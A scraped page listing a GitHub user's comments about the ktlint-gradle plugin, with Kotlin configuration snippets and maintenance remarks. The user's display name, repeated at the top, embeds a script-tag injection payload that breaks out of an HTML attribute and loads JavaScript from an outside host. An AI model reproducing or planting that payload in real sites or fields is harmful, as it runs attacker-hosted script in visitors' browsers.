Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

Results 596 comments of Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

Probably mandatory given the speed at which Java 9 and 10 is being adopted. Unless the tests are flaky on those VMs

You can also specify a custom ktlint version as an end-user ```kotlin configure { version.set("0.22.0") } ```

Try adding: ```kotlin allprojects { configure { version.set("0.42.1") } } ```

It's a plugin for Gradle that will configure IJ to conform to the Ktlint format settings.

See: https://github.com/JLLeitschuh/ktlint-gradle#additional-helper-tasks Your IDE will only be configured if you run one of the two IDEA specific tasks.

If I set it up right, `"org.jlleitschuh.gradle.ktlint"` should automatically apply the `"org.jlleitschuh.gradle.ktlint-idea"` plugin automatically.

I thought I had documented it at one point, @Tapchicoma what happened to the 'what plugin is applied' documentation? Did that get removed at some point?

I guess one solution is to simply say that if someone requires backwards compatibility, they are welcome to contribute it. Under that pretense, please be sure to clearly document that...